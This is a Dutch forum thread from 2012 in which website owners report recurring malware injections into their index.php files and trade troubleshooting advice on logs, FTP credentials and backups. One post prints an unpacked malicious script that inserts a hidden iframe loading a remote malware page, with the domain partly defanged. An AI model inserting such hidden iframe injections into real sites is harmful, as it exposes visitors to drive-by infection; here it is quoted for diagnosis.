Gehacked? Script of server
Vanavond ben ik in paniek gebeld door een vriend. Zijn site gaf een virus melding....
Even kijken.
En inderdaad een hele leuke foutmelding.:
Als ik in de code kijk zie ik:
Nu ik die code verwijderen. En helaas een twee uur later staat dezelfde code er weer in.
Ik vraag mij nu dus twee dingen af. Zit er één of ander script op dat kijkt of ze er nog in zit? (de code) of is dat één of ander kind wat leuk bijverdient in een heel arm land?
Ten tweede.. Hoe is hij gehacked? Is het de server zelf of is dit gewoon gebruik maken van een lek in het CMS systeem?
Bij voorbaat dank
Toevoeging op 15/02/2012 20:20:06:
Als ik met Javascript unpacker het scriptje bekijk komt er dit uit:
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
Gewijzigd op 15/02/2012 21:02:51 door Alex Hakkenberg
Het beste is om (samen met de provider) de logs door te spitten, en de PC waarmee je FTP-connecties aanlegt even flink door te lichten met een virusscan. Laat je hosting ook per direct de FTP-inloggegevens aanpassen.
Gewijzigd op 15/02/2012 21:01:56 door Alex Hakkenberg
Deze melding heb ik vandaag ook gekregen op de website.
Na onderzoeken op de server bleek de index.php aangepast te zijn op 16:46 vandaag.
Echter kreeg ik de file op geen enkele manier open laat staan dat ik het kon opslaan.
Elke pc die ik probeerde ging gelijk de alarm bellen rinkelen.
In de logs was niks te vinden wat er op deed vermoeden dat er was ingelogt of was gehackt op die tijdstip. Wij hebben daarom alle wachtwoorden van mysql, admin panell en ftp verandert en een complete server backup terug gezet.
Dit lijkt het probleem te hebben verholpen. Tevens laat de proveider zowiezo op virus en malware scannen.
Sinds 6:10 vanmorgen had ik deze Malware ook op mijn website.
Ik heb de code kunnen verwijdreren maar ik heb geen idee waar het vandaan komt.
Ik heb duizenden bezoekers per dag, en honderden tegelijk online.
Dit is wel een groot probleem voor mij, weet iemand hier meer over?
En is dit OS gevoelig en dergelijk?
Bedankt.
Script:
http://pastebin.com/dARUvBZ7
Gewijzigd op 16/02/2012 12:59:10 door Koekjes Bakker
Ga zelf eerst een naar virussen scannen, en laat dan je hosting het de wachtwoorden aanpassen.
Gewijzigd op 16/02/2012 13:21:01 door - Ariën -
Wat meer informatie is welkom, Toevallig Joomla!, wordpress of een ander framework draaien?
En een paar prestashop installaties.
Gebruik je toevallig een kant en klaar contact formulier? Ik gebruik die namelijk wel, iets va Free form mail tool ofzo. Ik vermoed dat via het contact formulier iets in de index.php gezet is. Heb net naar ISND gebeld en zij zeiden dat het 99 van de 100 x een foutieve onveilige code is waarvan erg vaak een contact formulier.
Groeten
mysql_rea_escape_string(); ?
Met vriendelijke groet,
Dave
Edit: ik had ook meerde website's draaien op een server, alle indexes die in mijn webfolder stonden zijn gewijzigt, ook van andere domeinen in onderliggende mappen.
En het word ingevoegd na het openen van de <body> tag.
Gewijzigd op 16/02/2012 17:22:41 door Koekjes Bakker
Ik zal zowiezo als test het contact formulier helemaal uit de site halen. Als alsnog de index wordt gewijzigd, ligt het niet aan het form maar aan de PC waarmee de ftp wordt bediend.
Heb zowiezo ook al een mail naar mijn hoster gestuurd.
Inmiddels zijn ook alle wachtwoorden vervangen.
Dus ik verwacht niet het contact form.
Bedankt voor de reacties!
En daarbij komt dat de 2 sites die gehackt zijn op 2 andere servers stonden.
Dat is ook nog eens heel erg vreemd.